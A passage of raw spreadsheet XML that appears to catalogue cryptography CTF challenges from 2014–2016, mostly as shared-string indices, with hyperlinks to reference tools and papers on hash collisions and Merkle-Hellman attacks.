      <c r="F57" s="5" t="s">
        <v>1097</v>
      </c>
      <c r="G57" s="35" t="s">
        <v>1098</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="30" t="s">
        <v>464</v>
      </c>
      <c r="B58" s="31">
        <v>2014.0</v>
      </c>
      <c r="C58" s="30" t="s">
        <v>1101</v>
      </c>
      <c r="D58" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E58" s="30" t="s">
        <v>1103</v>
      </c>
      <c r="F58" s="35" t="s">
        <v>1104</v>
      </c>
      <c r="G58" s="30"/>
    </row>
    <row r="59">
      <c r="A59" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B59" s="31">
        <v>2014.0</v>
      </c>
      <c r="C59" s="30" t="s">
        <v>1105</v>
      </c>
      <c r="D59" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E59" s="30" t="s">
        <v>1103</v>
      </c>
      <c r="F59" s="35" t="s">
        <v>1107</v>
      </c>
      <c r="G59" s="30" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B60" s="31">
        <v>2014.0</v>
      </c>
      <c r="C60" s="30" t="s">
        <v>1110</v>
      </c>
      <c r="D60" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E60" s="90" t="s">
        <v>927</v>
      </c>
      <c r="F60" s="35" t="s">
        <v>1115</v>
      </c>
      <c r="G60" s="30" t="s">
        <v>1116</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="30" t="s">
        <v>472</v>
      </c>
      <c r="B61" s="31">
        <v>2014.0</v>
      </c>
      <c r="C61" s="30" t="s">
        <v>1117</v>
      </c>
      <c r="D61" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E61" s="30" t="s">
        <v>1118</v>
      </c>
      <c r="F61" s="13" t="s">
        <v>1119</v>
      </c>
      <c r="G61" s="33" t="str">
        <f>HYPERLINK("https://code.google.com/archive/p/lxyppc-snake/source","crc32 collision generator ")</f>
        <v>crc32 collision generator </v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="s">
        <v>1125</v>
      </c>
      <c r="B62" s="43">
        <v>2014.0</v>
      </c>
      <c r="C62" s="5" t="s">
        <v>1126</v>
      </c>
      <c r="D62" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E62" s="56" t="s">
        <v>1127</v>
      </c>
      <c r="F62" s="56" t="s">
        <v>1128</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="s">
        <v>1125</v>
      </c>
      <c r="B63" s="43">
        <v>2014.0</v>
      </c>
      <c r="C63" s="5" t="s">
        <v>1134</v>
      </c>
      <c r="D63" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E63" s="5" t="s">
        <v>1136</v>
      </c>
      <c r="F63" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="s">
        <v>1125</v>
      </c>
      <c r="B64" s="43">
        <v>2014.0</v>
      </c>
      <c r="C64" s="5" t="s">
        <v>1138</v>
      </c>
      <c r="D64" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E64" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F64" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B65" s="24">
        <v>2014.0</v>
      </c>
      <c r="C65" s="23" t="s">
        <v>1143</v>
      </c>
      <c r="D65" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E65" s="23" t="s">
        <v>1055</v>
      </c>
      <c r="F65" s="23" t="s">
        <v>1146</v>
      </c>
      <c r="G65" s="23"/>
      <c r="H65" s="28"/>
    </row>
    <row r="66">
      <c r="A66" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B66" s="24">
        <v>2014.0</v>
      </c>
      <c r="C66" s="23" t="s">
        <v>1147</v>
      </c>
      <c r="D66" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E66" s="23" t="s">
        <v>826</v>
      </c>
      <c r="F66" s="23" t="s">
        <v>1148</v>
      </c>
      <c r="G66" s="23"/>
      <c r="H66" s="23"/>
    </row>
    <row r="67">
      <c r="A67" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B67" s="24">
        <v>2014.0</v>
      </c>
      <c r="C67" s="23" t="s">
        <v>1149</v>
      </c>
      <c r="D67" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E67" s="23" t="s">
        <v>1055</v>
      </c>
      <c r="F67" s="23" t="s">
        <v>1152</v>
      </c>
      <c r="G67" s="23"/>
      <c r="H67" s="23"/>
    </row>
    <row r="68">
      <c r="A68" s="23" t="s">
        <v>481</v>
      </c>
      <c r="B68" s="24">
        <v>2014.0</v>
      </c>
      <c r="C68" s="23" t="s">
        <v>1154</v>
      </c>
      <c r="D68" s="23" t="s">
        <v>128</v>
      </c>
      <c r="E68" s="23" t="s">
        <v>924</v>
      </c>
      <c r="F68" s="23" t="s">
        <v>1155</v>
      </c>
      <c r="G68" s="23"/>
      <c r="H68" s="23"/>
    </row>
    <row r="69">
      <c r="A69" s="17">
        <v>42521.0</v>
      </c>
      <c r="B69" s="7"/>
      <c r="C69" s="6"/>
      <c r="D69" s="6"/>
      <c r="E69" s="6"/>
      <c r="F69" s="6"/>
      <c r="G69" s="6"/>
      <c r="H69" s="6"/>
      <c r="I69" s="8"/>
      <c r="J69" s="8"/>
      <c r="K69" s="9"/>
      <c r="L69" s="9"/>
      <c r="M69" s="9"/>
      <c r="N69" s="9"/>
      <c r="O69" s="9"/>
      <c r="P69" s="9"/>
      <c r="Q69" s="9"/>
      <c r="R69" s="9"/>
      <c r="S69" s="9"/>
      <c r="T69" s="9"/>
      <c r="U69" s="9"/>
      <c r="V69" s="9"/>
      <c r="W69" s="9"/>
      <c r="X69" s="9"/>
      <c r="Y69" s="9"/>
      <c r="Z69" s="9"/>
    </row>
    <row r="70">
      <c r="A70" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B70" s="40">
        <v>2014.0</v>
      </c>
      <c r="C70" s="40" t="s">
        <v>1163</v>
      </c>
      <c r="D70" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E70" s="40" t="s">
        <v>1082</v>
      </c>
      <c r="F70" s="40" t="s">
        <v>1166</v>
      </c>
      <c r="G70" s="61" t="s">
        <v>1167</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B71" s="31">
        <v>2014.0</v>
      </c>
      <c r="C71" s="30" t="s">
        <v>1169</v>
      </c>
      <c r="D71" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E71" s="30" t="s">
        <v>1170</v>
      </c>
      <c r="F71" s="13" t="s">
        <v>1171</v>
      </c>
      <c r="G71" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2014/blob/master/asis-ctf-quals-2014/archaic/Merkle_Hellman_Attacks.pdf","Merkle-Hellman Attacks")</f>
        <v>Merkle-Hellman Attacks</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B72" s="31">
        <v>2014.0</v>
      </c>
      <c r="C72" s="30" t="s">
        <v>1179</v>
      </c>
      <c r="D72" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E72" s="30" t="s">
        <v>1181</v>
      </c>
      <c r="F72" s="30" t="s">
        <v>1182</v>
      </c>
      <c r="G72" s="30"/>
    </row>
    <row r="73">
      <c r="A73" s="30" t="s">
        <v>1168</v>
      </c>
      <c r="B73" s="31">
        <v>2014.0</v>
      </c>
      <c r="C73" s="30" t="s">
        <v>1185</v>
      </c>
      <c r="D73" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E73" s="30" t="s">
        <v>1186</v>
      </c>
      <c r="F73" s="30" t="s">
        <v>1188</v>
      </c>
      <c r="G73" s="30"/>
    </row>
    <row r="74">
      <c r="A74" s="40" t="s">
        <v>515</v>
      </c>
      <c r="B74" s="40">
        <v>2014.0</v>
      </c>
      <c r="C74" s="40" t="s">
        <v>1189</v>
      </c>
      <c r="D74" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E74" s="40" t="s">
        <v>826</v>
      </c>
      <c r="F74" s="40" t="s">
        <v>1191</v>
      </c>
      <c r="G74" s="40" t="s">
        <v>1192</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B75" s="40">
        <v>2014.0</v>
      </c>
      <c r="C75" s="40" t="s">
        <v>1196</v>
      </c>
      <c r="D75" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E75" s="40" t="s">
        <v>716</v>
      </c>
      <c r="F75" s="40" t="s">
        <v>1197</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B76" s="40">
        <v>2014.0</v>
      </c>
      <c r="C76" s="40" t="s">
        <v>1198</v>
      </c>
      <c r="D76" s="40" t="s">
        <v>23</v>
      </c>
      <c r="E76" s="40" t="s">
        <v>716</v>
      </c>
      <c r="F76" s="40" t="s">
        <v>1201</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B77" s="40">
        <v>2014.0</v>
      </c>
      <c r="C77" s="40" t="s">
        <v>1202</v>
      </c>
      <c r="D77" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E77" s="40" t="s">
        <v>924</v>
      </c>
      <c r="F77" s="13" t="s">
        <v>1205</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B78" s="43">
        <v>2014.0</v>
      </c>
      <c r="C78" s="5" t="s">
        <v>1210</v>
      </c>
      <c r="D78" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E78" s="5" t="s">
        <v>1211</v>
      </c>
      <c r="F78" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G78" s="92" t="s">
        <v>1212</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B79" s="43">
        <v>2014.0</v>
      </c>
      <c r="C79" s="5" t="s">
        <v>1220</v>
      </c>
      <c r="D79" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E79" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F79" s="93" t="s">
        <v>1224</v>
      </c>
      <c r="G79" s="3"/>
    </row>
    <row r="80">
      <c r="A80" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B80" s="43">
        <v>2014.0</v>
      </c>
      <c r="C80" s="5" t="s">
        <v>766</v>
      </c>
      <c r="D80" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E80" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F80" s="5" t="s">
        <v>1230</v>
      </c>
      <c r="G80" s="5" t="s">
        <v>1233</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B81" s="43">
        <v>2014.0</v>
      </c>
      <c r="C81" s="5" t="s">
        <v>1234</v>
      </c>
      <c r="D81" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E81" s="5" t="s">
        <v>1088</v>
      </c>
      <c r="F81" s="5" t="s">
        <v>1235</v>
      </c>
      <c r="G81" s="3"/>
    </row>
    <row r="82">
      <c r="A82" s="5" t="s">
        <v>578</v>
      </c>
      <c r="B82" s="43">
        <v>2014.0</v>
      </c>
      <c r="C82" s="5" t="s">
        <v>1236</v>
      </c>
      <c r="D82" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E82" s="5" t="s">
        <v>1211</v>
      </c>
      <c r="F82" s="93" t="s">
        <v>1240</v>
      </c>
      <c r="G82" s="3"/>
    </row>
    <row r="83">
      <c r="A83" s="40" t="s">
        <v>553</v>
      </c>
      <c r="B83" s="40">
        <v>2014.0</v>
      </c>
      <c r="C83" s="40" t="s">
        <v>1241</v>
      </c>
      <c r="D83" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E83" s="40" t="s">
        <v>716</v>
      </c>
      <c r="F83" s="40" t="s">
        <v>1242</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B84" s="31">
        <v>2014.0</v>
      </c>
      <c r="C84" s="30" t="s">
        <v>1143</v>
      </c>
      <c r="D84" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E84" s="30" t="s">
        <v>1243</v>
      </c>
      <c r="F84" s="30" t="s">
        <v>1244</v>
      </c>
      <c r="G84" s="33" t="str">
        <f>HYPERLINK("https://www.cryptool.org/en/cryptool1","Cryptool 1")</f>
        <v>Cryptool 1</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B85" s="31">
        <v>2014.0</v>
      </c>
      <c r="C85" s="30" t="s">
        <v>1147</v>
      </c>
      <c r="D85" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E85" s="30" t="s">
        <v>924</v>
      </c>
      <c r="F85" s="30" t="s">
        <v>1253</v>
      </c>
      <c r="G85" s="33" t="str">
        <f>HYPERLINK("https://github.com/google/keyczar","keyczar")</f>
        <v>keyczar</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B86" s="31">
        <v>2014.0</v>
      </c>
      <c r="C86" s="30" t="s">
        <v>1154</v>
      </c>
      <c r="D86" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E86" s="35" t="s">
        <v>1055</v>
      </c>
      <c r="F86" s="30" t="s">
        <v>1257</v>
      </c>
      <c r="G86" s="30"/>
    </row>
    <row r="87">
      <c r="A87" s="30" t="s">
        <v>619</v>
      </c>
      <c r="B87" s="31">
        <v>2014.0</v>
      </c>
      <c r="C87" s="30" t="s">
        <v>1258</v>
      </c>
      <c r="D87" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E87" s="35" t="s">
        <v>1259</v>
      </c>
      <c r="F87" s="35" t="s">
        <v>1260</v>
      </c>
      <c r="G87" s="32" t="s">
        <v>1261</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="17">
        <v>42528.0</v>
      </c>
      <c r="B88" s="7"/>
      <c r="C88" s="6"/>
      <c r="D88" s="6"/>
      <c r="E88" s="6"/>
      <c r="F88" s="6"/>
      <c r="G88" s="6"/>
      <c r="H88" s="6"/>
      <c r="I88" s="8"/>
      <c r="J88" s="8"/>
      <c r="K88" s="9"/>
      <c r="L88" s="9"/>
      <c r="M88" s="9"/>
      <c r="N88" s="9"/>
      <c r="O88" s="9"/>
      <c r="P88" s="9"/>
      <c r="Q88" s="9"/>
      <c r="R88" s="9"/>
      <c r="S88" s="9"/>
      <c r="T88" s="9"/>
      <c r="U88" s="9"/>
      <c r="V88" s="9"/>
      <c r="W88" s="9"/>
      <c r="X88" s="9"/>
      <c r="Y88" s="9"/>
      <c r="Z88" s="9"/>
    </row>
    <row r="89">
      <c r="A89" s="40" t="s">
        <v>1269</v>
      </c>
      <c r="B89" s="40">
        <v>2016.0</v>
      </c>
      <c r="C89" s="40" t="s">
        <v>1271</v>
      </c>
      <c r="D89" s="40" t="s">
        <v>48</v>
      </c>
      <c r="F89" s="13" t="s">
        <v>1273</v>
      </c>
      <c r="G89" s="40" t="s">
        <v>1274</v>
      </c>
      <c r="K89" s="58" t="str">
        <f>HYPERLINK("https://mathiasbynens.be/notes/pbkdf2-hmac","PBKDF2+HMAC hash collisions explained · Mathias Bynens")</f>
        <v>PBKDF2+HMAC hash collisions explained · Mathias Bynens</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="30" t="s">
        <v>654</v>
      </c>
      <c r="B90" s="31">
        <v>2014.0</v>
      </c>
      <c r="C90" s="30" t="s">
        <v>1279</v>
      </c>
      <c r="D90" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E90" s="30" t="s">
        <v>1088</v>
      </c>
      <c r="F90" s="35" t="s">
        <v>1280</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B91" s="31">
        <v>2014.0</v>
      </c>
      <c r="C91" s="30" t="s">
        <v>1281</v>
      </c>
      <c r="D91" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E91" s="30" t="s">
        <v>1282</v>
      </c>
      <c r="F91" s="35" t="s">
        <v>1283</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B92" s="31">
        <v>2014.0</v>
      </c>
      <c r="C92" s="30" t="s">
        <v>1284</v>
      </c>
      <c r="D92" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E92" s="30" t="s">
        <v>1285</v>
      </c>
      <c r="F92" s="35" t="s">
        <v>1286</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="40" t="s">
        <v>1287</v>
      </c>
      <c r="B93" s="40">
        <v>2014.0</v>
      </c>
      <c r="C93" s="40" t="s">
        <v>1289</v>
      </c>
      <c r="D93" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E93" s="40" t="s">
        <v>766</v>
      </c>
      <c r="F93" s="95" t="s">
        <v>1291</v>
      </c>
      <c r="G93" s="52" t="s">
        <v>1304</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B94" s="40">
        <v>2014.0</v>
      </c>
      <c r="C94" s="40" t="s">
        <v>900</v>
      </c>
      <c r="D94" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E94" s="40" t="s">
        <v>1308</v>
      </c>
      <c r="F94" s="40" t="s">
        <v>1310</v>
      </c>
      <c r="G94" s="40" t="s">
        <v>1312</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B95" s="40">
        <v>2014.0</v>
      </c>
      <c r="C95" s="40" t="s">
        <v>1315</v>
      </c>
      <c r="D95" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E95" s="40" t="s">
        <v>1318</v>
      </c>
      <c r="F95" s="40" t="s">
        <v>1320</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="40" t="s">
        <v>665</v>
      </c>
      <c r="B96" s="40">
        <v>2014.0</v>
      </c>
      <c r="C96" s="40" t="s">
        <v>1323</v>
      </c>
      <c r="D96" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E96" s="40" t="s">
        <v>1325</v>
      </c>
      <c r="F96" s="40" t="s">
        <v>1326</v>
      </c>
      <c r="G96" s="40" t="s">
        <v>1327</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B97" s="43">
        <v>2015.0</v>
      </c>
      <c r="C97" s="5" t="s">
        <v>1330</v>
      </c>
      <c r="D97" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E97" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F97" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G97" s="3"/>
    </row>
    <row r="98">
      <c r="A98" s="5" t="s">
        <v>673</v>
      </c>
      <c r="B98" s="43">
        <v>2015.0</v>
      </c>
      <c r="C98" s="5" t="s">
        <v>1336</v>
      </c>
      <c r="D98" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E98" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F98" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G98" s="3"/>
    </row>
    <row r="99">
      <c r="A99" s="17">
        <v>42535.0</v>
      </c>
      <c r="B99" s="7"/>
      <c r="C99" s="6"/>
      <c r="D99" s="6"/>
      <c r="E99" s="6"/>
      <c r="F99" s="6"/>
      <c r="G99" s="6"/>
      <c r="H99" s="6"/>
      <c r="I99" s="8"/>
      <c r="J99" s="8"/>
      <c r="K99" s="9"/>
      <c r="L99" s="9"/>
      <c r="M99" s="9"/>
      <c r="N99" s="9"/>
      <c r="O99" s="9"/>
      <c r="P99" s="9"/>
      <c r="Q99" s="9"/>
      <c r="R99" s="9"/>
      <c r="S99" s="9"/>
      <c r="T99" s="9"/>
      <c r="U99" s="9"/>
      <c r="V99" s="9"/>
      <c r="W99" s="9"/>
      <c r="X99" s="9"/>
      <c r="Y99" s="9"/>
      <c r="Z99" s="9"/>
    </row>
    <row r="100">
      <c r="A100" s="30" t="s">
        <v>695</v>
      </c>
      <c r="B100" s="31">
        <v>2015.0</v>
      </c>
      <c r="C100" s="30" t="s">
        <v>1342</v>
      </c>
      <c r="D100" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E100" s="30" t="s">
        <v>1345</v>
      </c>
      <c r="F100" s="35" t="s">
        <v>1352</v>
      </c>
      <c r="G100" s="33" t="str">
        <f>HYPERLINK("https://heinrichs.io/207","Extract VoIP data from Alice IAD")</f>
        <v>Extract VoIP data from Alice IAD</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B101" s="31">
        <v>2014.0</v>
      </c>
      <c r="C101" s="30" t="s">
        <v>1361</v>
      </c>
      <c r="D101" s="30" t="s">
        <v>1363</v>
      </c>
      <c r="E101" s="30" t="s">
        <v>1365</v>
      </c>
      <c r="F101" s="35" t="s">
        <v>1367</v>
      </c>
      <c r="G101" s="33" t="str">
        <f>HYPERLINK("http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip , ","FastColl Tool")</f>
        <v>FastColl Tool</v>
      </c>
      <c r="H101" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Merkle%E2%80%93Damg%C3%A5rd_construction","Merkle-Damgard Construction")</f>
        <v>Merkle-Damgard Construction</v>
      </c>
      <c r="I101" s="33" t="str">
        <f>HYPERLINK("http://www.iacr.org/cryptodb/archive/2004/CRYPTO/1472/1472.pdf","Multicollisions in iterated hash functions")</f>
        <v>Multicollisions in iterated hash functions</v>
      </c>
      <c r="J101" s="30"/>
    </row>
    <row r="102">
      <c r="A102" s="30" t="s">
        <v>690</v>
      </c>
      <c r="B102" s="31">
        <v>2014.0</v>
      </c>
      <c r="C102" s="30" t="s">
        <v>1387</v>
      </c>
      <c r="D102" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E102" s="30" t="s">
        <v>1388</v>
      </c>
      <c r="F102" s="97" t="s">
        <v>1389</v>
      </c>
      <c r="G102" s="30"/>
      <c r="H102" s="30"/>
      <c r="I102" s="30"/>
      <c r="J102" s="30"/>
    </row>
    <row r="103">
      <c r="A103" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B103" s="43">
        <v>2015.0</v>
      </c>
      <c r="C103" s="5" t="s">
        <v>1390</v>
      </c>
      <c r="D103" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E103" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F103" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B104" s="43">
        <v>2015.0</v>
      </c>
      <c r="C104" s="5" t="s">
        <v>1391</v>
      </c>
      <c r="D104" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E104" s="5" t="s">
        <v>1392</v>
      </c>
      <c r="F104" s="13" t="s">
        <v>1393</v>
      </c>
      <c r="G104" s="92" t="s">
        <v>1395</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="s">
        <v>701</v>
      </c>
      <c r="B105" s="43">
        <v>2015.0</v>
      </c>
      <c r="C105" s="5" t="s">
        <v>1403</v>
      </c>
      <c r="D105" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E105" s="5" t="s">
        <v>716</v>
      </c>
      <c r="F105" s="5" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="s">
        <v>726</v>
      </c>
      <c r="B106" s="43">
        <v>2015.0</v>
      </c>
      <c r="C106" s="5" t="s">
        <v>1404</v>
      </c>
      <c r="D106" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E106" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F106" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G106" s="5" t="s">
        <v>1098</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="37">
        <v>9447.0</v>
      </c>
      <c r="B107" s="40">
        <v>2015.0</v>
      </c>
      <c r="C107" s="40" t="s">
        <v>1405</v>
      </c>
      <c r="D107" s="40" t="s">
        <v>48</v>
      </c>
      <c r="E107" s="40" t="s">
        <v>716</v>
      </c>
      <c r="F107" s="40" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="17">
        <v>42538.0</v>
      </c>
      <c r="B108" s="7"/>
      <c r="C108" s="6"/>
      <c r="D108" s="6"/>
      <c r="E108" s="6"/>
      <c r="F108" s="6"/>
      <c r="G108" s="6"/>
      <c r="H108" s="6"/>
      <c r="I108" s="8"/>
      <c r="J108" s="8"/>
      <c r="K108" s="9"/>
      <c r="L108" s="9"/>
      <c r="M108" s="9"/>
      <c r="N108" s="9"/>
      <c r="O108" s="9"/>
      <c r="P108" s="9"/>
      <c r="Q108" s="9"/>
      <c r="R108" s="9"/>
      <c r="S108" s="9"/>
      <c r="T108" s="9"/>
      <c r="U108" s="9"/>
      <c r="V108" s="9"/>
      <c r="W108" s="9"/>
      <c r="X108" s="9"/>
      <c r="Y108" s="9"/>
      <c r="Z108" s="9"/>
    </row>
    <row r="109">
      <c r="A109" s="37">
        <v>9447.0</v>
      </c>
      <c r="B109" s="40">
        <v>2015.0</v>
      </c>
      <c r="C109" s="40" t="s">
        <v>1411</v>
      </c>
      <c r="D109" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E109" s="40" t="s">
        <v>1412</v>
      </c>
      <c r="F109" s="40" t="s">
        <v>1413</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="37">
        <v>9447.0</v>
      </c>
      <c r="B110" s="40">
        <v>2015.0</v>
      </c>
      <c r="C110" s="40" t="s">
        <v>1414</v>
      </c>
      <c r="D110" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E110" s="40" t="s">
        <v>1416</v>
      </c>
      <c r="F110" s="40" t="s">
        <v>1418</v>
      </c>
      <c r="G110" s="40" t="s">
        <v>1421</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="37">
        <v>9447.0</v>
      </c>
      <c r="B111" s="40">
        <v>2015.0</v>
      </c>
      <c r="C111" s="40" t="s">
        <v>1422</v>
      </c>
      <c r="D111" s="40" t="s">
        <v>128</v>
      </c>
      <c r="E111" s="40" t="s">
        <v>716</v>
      </c>
      <c r="F111" s="40" t="s">
        <v>1425</v>
      </c>
      <c r="G111" s="40" t="s">
        <v>1427</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B112" s="43">
        <v>2015.0</v>
      </c>
      <c r="C112" s="5" t="s">
        <v>1269</v>
      </c>
      <c r="D112" s="5" t="s">
        <v>1363</v>
      </c>
      <c r="E112" s="5" t="s">
        <v>1429</v>
      </c>
      <c r="F112" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G112" s="5" t="s">
        <v>1430</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B113" s="43">
        <v>2015.0</v>
      </c>
      <c r="C113" s="5" t="s">
        <v>1432</v>
      </c>
      <c r="D113" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E113" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F113" s="5" t="s">
        <v>1435</v>
      </c>
      <c r="G113" s="3"/>
    </row>
    <row r="114">
      <c r="A114" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B114" s="43">
        <v>2015.0</v>
      </c>
      <c r="C114" s="5" t="s">
        <v>1440</v>
      </c>
      <c r="D114" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E114" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F114" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G114" s="3"/>
    </row>
    <row r="115">
      <c r="A115" s="5" t="s">
        <v>741</v>
      </c>
      <c r="B115" s="43">
        <v>2015.0</v>
      </c>
      <c r="C115" s="5" t="s">
        <v>1443</v>
      </c>
      <c r="D115" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E115" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F115" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G115" s="5" t="s">
        <v>1445</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B116" s="43">
        <v>2015.0</v>
      </c>
      <c r="C116" s="5" t="s">
        <v>1447</v>
      </c>
      <c r="D116" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E116" s="5" t="s">
        <v>1055</v>
      </c>
      <c r="F116" s="5" t="s">
        <v>682</v>
      </c>
      <c r="G116" s="5" t="s">
        <v>1450</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="s">
        <v>754</v>
      </c>
      <c r="B117" s="43">
        <v>2015.0</v>
      </c>
      <c r="C117" s="5" t="s">
        <v>1459</v>
      </c>
      <c r="D117" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E117" s="5" t="s">
        <v>766</v>
      </c>
      <c r="F117" s="5" t="s">
        <v>1460</v>
      </c>
      <c r="G117" s="56" t="s">
        <v>1462</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="44" t="s">
        <v>754</v>
      </c>
      <c r="B118" s="101">
        <v>2015.0</v>
      </c>
      <c r="C118" s="44" t="s">
        <v>1479</v>
      </c>
      <c r="D118" s="44" t="s">
        <v>48</v>
      </c>
      <c r="E118" s="44" t="s">
        <v>1481</v>
      </c>
